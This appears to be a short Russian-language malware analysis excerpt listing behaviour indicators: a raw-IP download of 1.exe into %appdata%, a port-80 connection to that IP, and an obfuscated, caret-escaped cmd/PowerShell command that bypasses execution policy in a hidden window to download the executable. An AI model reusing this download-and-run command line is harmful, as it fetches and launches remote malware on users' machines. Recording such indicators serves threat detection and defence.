Техническая информация
- http://86.106.131.141/1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOWE^r^s^He^ll.E^xe^ ^-eXE^CU^TIOnp^olIcy BypaSS ^-n^opro^f^il^E -W^In^dO^wsTYlE ^hi^d^deN (new-ObJEcT SySTE^M^.NeT^.^Webcl^i^EnT).^dOw^N^lOaDfIl^E^(^'http://86.106.131.141/1.exe','%APP...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /c "pOWE^r^s^He^ll.E^xe^ ^-eXE^CU^TIOnp^olIcy BypaSS ^-n^opro^f^il^E -W^In^dO^wsTYlE ^hi^d^deN (new-ObJEcT SySTE^M^.NeT^.^Webcl^i^EnT).^dOw^N^lOaDfIl^E^(^'http://86.106.131.141/1.exe','%APP...' (со скрытым окном)